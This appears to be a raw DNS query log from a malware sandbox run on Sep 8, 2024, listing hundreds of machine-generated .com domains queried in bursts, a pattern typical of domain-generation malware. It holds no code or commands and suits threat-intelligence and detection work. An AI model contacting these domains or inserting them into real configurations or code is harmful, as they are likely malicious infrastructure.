                                                                                                                                                                                                          Sep 8, 2024 10:53:17.658020020 CEST192.168.2.91.1.1.10x97c1Standard query (0)puzymig.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:17.662659883 CEST192.168.2.91.1.1.10x68e1Standard query (0)lygyfex.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:17.665349960 CEST192.168.2.91.1.1.10x5c1bStandard query (0)qegyfyp.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:17.666011095 CEST192.168.2.91.1.1.10x1c57Standard query (0)gacyqob.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:17.666882038 CEST192.168.2.91.1.1.10x26fcStandard query (0)puryxuq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:17.669723034 CEST192.168.2.91.1.1.10xdba1Standard query (0)qeqylyl.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:17.678649902 CEST192.168.2.91.1.1.10xf46fStandard query (0)vowyzuk.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:17.679527044 CEST192.168.2.91.1.1.10xfe8eStandard query (0)qexyqog.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:17.682180882 CEST192.168.2.91.1.1.10x9c2cStandard query (0)pufydep.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:17.682349920 CEST192.168.2.91.1.1.10x594bStandard query (0)gaqyzuw.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:17.682502031 CEST192.168.2.91.1.1.10x587fStandard query (0)lyxymin.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:17.682643890 CEST192.168.2.91.1.1.10x121dStandard query (0)vofydac.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:17.717139006 CEST192.168.2.91.1.1.10x17bcStandard query (0)lygynud.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:17.719717026 CEST192.168.2.91.1.1.10x796eStandard query (0)gatydaw.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:17.722059965 CEST192.168.2.91.1.1.10x7786Standard query (0)qetyxiq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:17.732719898 CEST192.168.2.91.1.1.10x867eStandard query (0)qegynuv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:17.732903004 CEST192.168.2.91.1.1.10x1ab2Standard query (0)lyvylyn.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:17.733057022 CEST192.168.2.91.1.1.10xca7fStandard query (0)vocykem.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:17.733264923 CEST192.168.2.91.1.1.10x5dcStandard query (0)qetysal.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:17.733467102 CEST192.168.2.91.1.1.10x674eStandard query (0)vojymic.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:17.733514071 CEST192.168.2.91.1.1.10xf266Standard query (0)qeqytup.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:17.733721018 CEST192.168.2.91.1.1.10xaa0aStandard query (0)volyjok.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:17.733762980 CEST192.168.2.91.1.1.10xfab5Standard query (0)qedyveg.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:17.733978987 CEST192.168.2.91.1.1.10xa923Standard query (0)purypol.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:17.734164953 CEST192.168.2.91.1.1.10x61a0Standard query (0)gahynus.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:17.735537052 CEST192.168.2.91.1.1.10xdca7Standard query (0)lyryxij.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:17.735799074 CEST192.168.2.91.1.1.10xd655Standard query (0)gacykeh.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:17.735969067 CEST192.168.2.91.1.1.10x20a7Standard query (0)lyxyjaj.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:17.736064911 CEST192.168.2.91.1.1.10x384bStandard query (0)gadyveb.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:17.736390114 CEST192.168.2.91.1.1.10xf2caStandard query (0)lymytux.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:17.736555099 CEST192.168.2.91.1.1.10xee38Standard query (0)pumytup.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:17.736871004 CEST192.168.2.91.1.1.10xb77fStandard query (0)vofybyf.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:17.737441063 CEST192.168.2.91.1.1.10x801cStandard query (0)vocyqaf.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:17.737634897 CEST192.168.2.91.1.1.10xc19bStandard query (0)gaqypiz.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:17.737837076 CEST192.168.2.91.1.1.10x2046Standard query (0)puzyjoq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:17.737884998 CEST192.168.2.91.1.1.10xc50Standard query (0)qexykaq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:17.749880075 CEST192.168.2.91.1.1.10x2235Standard query (0)lysyvan.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:17.750581980 CEST192.168.2.91.1.1.10xda6fStandard query (0)galyhiw.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:17.750683069 CEST192.168.2.91.1.1.10xcae4Standard query (0)ganyrys.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:17.750790119 CEST192.168.2.91.1.1.10xeb4Standard query (0)vonyryc.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:17.751463890 CEST192.168.2.91.1.1.10x6e74Standard query (0)lyvywed.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:17.751657009 CEST192.168.2.91.1.1.10xf83Standard query (0)puvywav.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:17.751682043 CEST192.168.2.91.1.1.10xa274Standard query (0)vopycom.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:17.753660917 CEST192.168.2.91.1.1.10x4243Standard query (0)qekyhil.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:17.759802103 CEST192.168.2.91.1.1.10xfebeStandard query (0)vojygut.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:17.768759012 CEST192.168.2.91.1.1.10x5329Standard query (0)gahyfyz.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:27.787924051 CEST192.168.2.91.1.1.10x9f45Standard query (0)lysysod.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:27.794678926 CEST192.168.2.91.1.1.10x8422Standard query (0)vopypif.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:27.797039032 CEST192.168.2.91.1.1.10x3b05Standard query (0)qebykap.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:27.797697067 CEST192.168.2.91.1.1.10xe004Standard query (0)gatypub.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:27.798551083 CEST192.168.2.91.1.1.10xf24aStandard query (0)pujybyq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:27.800458908 CEST192.168.2.91.1.1.10x1b5cStandard query (0)lyvyjox.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:27.801225901 CEST192.168.2.91.1.1.10x8103Standard query (0)lykynyj.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:27.802054882 CEST192.168.2.91.1.1.10x85cStandard query (0)galynuh.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:27.802630901 CEST192.168.2.91.1.1.10x770Standard query (0)pumylel.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:27.802911997 CEST192.168.2.91.1.1.10x41bfStandard query (0)qedysov.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:27.803724051 CEST192.168.2.91.1.1.10x64fcStandard query (0)qekynuq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:27.804008007 CEST192.168.2.91.1.1.10xafacStandard query (0)ganykaz.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:27.804455042 CEST192.168.2.91.1.1.10xe14fStandard query (0)lyrytun.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:27.805100918 CEST192.168.2.91.1.1.10xe494Standard query (0)vonyqok.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:27.805221081 CEST192.168.2.91.1.1.10x39f0Standard query (0)pupypiv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:27.806176901 CEST192.168.2.91.1.1.10x6130Standard query (0)vonyket.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:27.807384014 CEST192.168.2.91.1.1.10x1279Standard query (0)lyryled.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:27.808294058 CEST192.168.2.91.1.1.10x6abdStandard query (0)lyxynyx.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:27.809765100 CEST192.168.2.91.1.1.10x63cbStandard query (0)vocymut.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:27.811239004 CEST192.168.2.91.1.1.10x538bStandard query (0)gaqykab.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:27.813843966 CEST192.168.2.91.1.1.10x4227Standard query (0)qexynyp.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:27.827827930 CEST192.168.2.91.1.1.10x42efStandard query (0)pufypiq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:27.854739904 CEST192.168.2.91.1.1.10xfed2Standard query (0)qegysoq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:27.855695009 CEST192.168.2.91.1.1.10x6c25Standard query (0)gatyzys.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:27.860083103 CEST192.168.2.91.1.1.10x84dStandard query (0)vojybek.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:27.862905979 CEST192.168.2.91.1.1.10xa3f6Standard query (0)volygyf.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:27.863775015 CEST192.168.2.91.1.1.10xaff5Standard query (0)pumywaq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:27.867000103 CEST192.168.2.91.1.1.10x35c3Standard query (0)gaqyreh.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:27.867032051 CEST192.168.2.91.1.1.10x653bStandard query (0)lyxygud.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:27.867996931 CEST192.168.2.91.1.1.10xe0b6Standard query (0)qeqyreq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:27.869319916 CEST192.168.2.91.1.1.10x5823Standard query (0)qetytug.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:27.870887995 CEST192.168.2.91.1.1.10xc382Standard query (0)qekyfeg.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:27.872430086 CEST192.168.2.91.1.1.10x48adStandard query (0)puvyjop.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:27.872864962 CEST192.168.2.91.1.1.10x22e7Standard query (0)puzyguv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:27.873963118 CEST192.168.2.91.1.1.10xc1b1Standard query (0)lymywaj.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:27.874169111 CEST192.168.2.91.1.1.10xb21dStandard query (0)gahyvew.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:27.876876116 CEST192.168.2.91.1.1.10x343Standard query (0)lygyvar.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:27.883085966 CEST192.168.2.91.1.1.10xf0bStandard query (0)gacyhis.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:27.883358002 CEST192.168.2.91.1.1.10xc0d9Standard query (0)qexyhuv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:27.883744001 CEST192.168.2.91.1.1.10x7b88Standard query (0)purytyg.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:27.883980036 CEST192.168.2.91.1.1.10x59fdStandard query (0)ganyqow.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:27.884280920 CEST192.168.2.91.1.1.10xb6c0Standard query (0)gadyciz.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:27.884511948 CEST192.168.2.91.1.1.10x7ce4Standard query (0)vofycot.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:27.884680033 CEST192.168.2.91.1.1.10xfbe9Standard query (0)qegyval.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:27.884833097 CEST192.168.2.91.1.1.10xf191Standard query (0)vowyrym.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:27.886004925 CEST192.168.2.91.1.1.10x952cStandard query (0)pupyxup.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:27.888158083 CEST192.168.2.91.1.1.10x8db1Standard query (0)gahydoh.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:27.890038013 CEST192.168.2.91.1.1.10x590Standard query (0)qebyqil.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:27.890655041 CEST192.168.2.91.1.1.10x5185Standard query (0)puvymul.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:27.892146111 CEST192.168.2.91.1.1.10x62f0Standard query (0)vojydam.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:27.892281055 CEST192.168.2.91.1.1.10x7974Standard query (0)pujydag.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:27.899794102 CEST192.168.2.91.1.1.10x6a6dStandard query (0)vopyzuc.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:27.900027990 CEST192.168.2.91.1.1.10x6cf0Standard query (0)lyvymir.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:27.900209904 CEST192.168.2.91.1.1.10xd11fStandard query (0)gacynuz.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:27.900516987 CEST192.168.2.91.1.1.10xa24cStandard query (0)qedyxip.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:27.901576996 CEST192.168.2.91.1.1.10x9d13Standard query (0)qetylyv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:27.909174919 CEST192.168.2.91.1.1.10xae17Standard query (0)pufycol.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:27.914758921 CEST192.168.2.91.1.1.10xbb99Standard query (0)galyfyb.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:27.918447018 CEST192.168.2.91.1.1.10x131eStandard query (0)lygysij.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:27.918463945 CEST192.168.2.91.1.1.10x11Standard query (0)lykyfen.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:27.919583082 CEST192.168.2.91.1.1.10x48b5Standard query (0)vocyjic.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:27.920553923 CEST192.168.2.91.1.1.10xe414Standard query (0)vowykaf.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:27.921236992 CEST192.168.2.91.1.1.10xc9adStandard query (0)lysyxux.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:27.925055027 CEST192.168.2.91.1.1.10xde3Standard query (0)purylev.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:28.806060076 CEST192.168.2.91.1.1.10x6abdStandard query (0)lyxynyx.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:28.868444920 CEST192.168.2.91.1.1.10xc0d9Standard query (0)qexyhuv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:28.884517908 CEST192.168.2.91.1.1.10x7ce4Standard query (0)vofycot.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:29.805625916 CEST192.168.2.91.1.1.10x6abdStandard query (0)lyxynyx.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:29.899425030 CEST192.168.2.91.1.1.10x7ce4Standard query (0)vofycot.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:31.494752884 CEST192.168.2.91.1.1.10x75e5Standard query (0)qexyhuv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:31.915034056 CEST192.168.2.91.1.1.10x7ce4Standard query (0)vofycot.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:32.510521889 CEST192.168.2.91.1.1.10x75e5Standard query (0)qexyhuv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:33.481517076 CEST192.168.2.91.1.1.10x105dStandard query (0)ww25.lyxynyx.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:33.508725882 CEST192.168.2.91.1.1.10x75e5Standard query (0)qexyhuv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:34.477509975 CEST192.168.2.91.1.1.10x105dStandard query (0)ww25.lyxynyx.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:35.036362886 CEST192.168.2.91.1.1.10x25Standard query (0)ww16.vofycot.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:36.039982080 CEST192.168.2.91.1.1.10x25Standard query (0)ww16.vofycot.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:37.055639029 CEST192.168.2.91.1.1.10x25Standard query (0)ww16.vofycot.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:38.113651037 CEST192.168.2.91.1.1.10x408bStandard query (0)volybec.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:38.114234924 CEST192.168.2.91.1.1.10xeee9Standard query (0)galyvas.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:38.115925074 CEST192.168.2.91.1.1.10x4473Standard query (0)lysytyr.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:38.116677046 CEST192.168.2.91.1.1.10x5ad6Standard query (0)pumyjig.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:38.118935108 CEST192.168.2.91.1.1.10x825aStandard query (0)purywop.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:38.119184017 CEST192.168.2.91.1.1.10x21a3Standard query (0)qeqykog.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:38.136405945 CEST192.168.2.91.1.1.10xdc33Standard query (0)lymyjon.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:38.138392925 CEST192.168.2.91.1.1.10x1d65Standard query (0)puzybep.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:38.138581038 CEST192.168.2.91.1.1.10xbf0fStandard query (0)vofypuk.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:38.139226913 CEST192.168.2.91.1.1.10x3355Standard query (0)qetyrap.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:38.139244080 CEST192.168.2.91.1.1.10x8d04Standard query (0)qegyxug.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:38.139800072 CEST192.168.2.91.1.1.10x5c6bStandard query (0)gadypuw.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:38.140284061 CEST192.168.2.91.1.1.10x5995Standard query (0)qedytul.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:38.156384945 CEST192.168.2.91.1.1.10x29d4Standard query (0)vojypuc.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:38.163805008 CEST192.168.2.91.1.1.10x7736Standard query (0)gaqyqis.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:38.164083004 CEST192.168.2.91.1.1.10xd5c5Standard query (0)vowyqoc.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:38.165591955 CEST192.168.2.91.1.1.10xdce9Standard query (0)lysylej.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:38.166536093 CEST192.168.2.91.1.1.10xa830Standard query (0)vojycif.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:38.167038918 CEST192.168.2.91.1.1.10xd444Standard query (0)pumymuv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:38.167217970 CEST192.168.2.91.1.1.10xffd6Standard query (0)galydoz.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:38.168637037 CEST192.168.2.91.1.1.10x63d8Standard query (0)qedyleq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:38.168809891 CEST192.168.2.91.1.1.10xf862Standard query (0)gadyzyh.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:38.169862986 CEST192.168.2.91.1.1.10xf63dStandard query (0)puzydal.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:38.170093060 CEST192.168.2.91.1.1.10x8a8cStandard query (0)volydot.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:38.170330048 CEST192.168.2.91.1.1.10x14c5Standard query (0)qeqyqiv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:38.170488119 CEST192.168.2.91.1.1.10x37b8Standard query (0)qexyfel.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:38.172931910 CEST192.168.2.91.1.1.10xa32bStandard query (0)pufyxug.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:38.173250914 CEST192.168.2.91.1.1.10xaeaeStandard query (0)qetykol.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:38.174129009 CEST192.168.2.91.1.1.10x67faStandard query (0)gatyrez.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:38.174700022 CEST192.168.2.91.1.1.10xb8c5Standard query (0)lyvyguj.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:38.176898003 CEST192.168.2.91.1.1.10x5b39Standard query (0)qebyhuq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:38.177109957 CEST192.168.2.91.1.1.10x5e80Standard query (0)lykyvod.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:38.177283049 CEST192.168.2.91.1.1.10xb30aStandard query (0)ganyhuh.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:38.177474976 CEST192.168.2.91.1.1.10xde55Standard query (0)gacyvah.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:38.178239107 CEST192.168.2.91.1.1.10xe073Standard query (0)puryjil.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:38.178271055 CEST192.168.2.91.1.1.10x2e0eStandard query (0)puvygyq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:38.178515911 CEST192.168.2.91.1.1.10x372Standard query (0)qegytyv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:38.181864023 CEST192.168.2.91.1.1.10x18adStandard query (0)pupytyl.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:38.182040930 CEST192.168.2.91.1.1.10xa242Standard query (0)pujycov.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:38.183033943 CEST192.168.2.91.1.1.10x2c5bStandard query (0)gahypus.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:38.183281898 CEST192.168.2.91.1.1.10x47beStandard query (0)lymymud.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:38.183458090 CEST192.168.2.91.1.1.10xadebStandard query (0)vopyret.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:38.185520887 CEST192.168.2.91.1.1.10x2210Standard query (0)gacyfew.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:38.197315931 CEST192.168.2.91.1.1.10x8f53Standard query (0)vocygyk.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:38.199126959 CEST192.168.2.91.1.1.10x54eaStandard query (0)lyxyfar.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:38.199289083 CEST192.168.2.91.1.1.10x5daaStandard query (0)lyryjir.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:38.199444056 CEST192.168.2.91.1.1.10xc72aStandard query (0)lygyxun.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:38.199636936 CEST192.168.2.91.1.1.10x2d37Standard query (0)vonymuf.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:38.199773073 CEST192.168.2.91.1.1.10xd5f7Standard query (0)gatykow.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:38.199942112 CEST192.168.2.91.1.1.10xfe9bStandard query (0)pupylaq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:38.199942112 CEST192.168.2.91.1.1.10x6f75Standard query (0)vofyzym.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:38.200110912 CEST192.168.2.91.1.1.10x9867Standard query (0)qekysip.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:38.200160980 CEST192.168.2.91.1.1.10xb525Standard query (0)vopykak.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:38.200258970 CEST192.168.2.91.1.1.10x873dStandard query (0)ganynyb.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:38.200361967 CEST192.168.2.91.1.1.10xed7Standard query (0)lykysix.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:38.200539112 CEST192.168.2.91.1.1.10x4f02Standard query (0)qebynyg.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:38.201138973 CEST192.168.2.91.1.1.10x58d8Standard query (0)lyrywax.comA (IP address)IN (0x0001)false
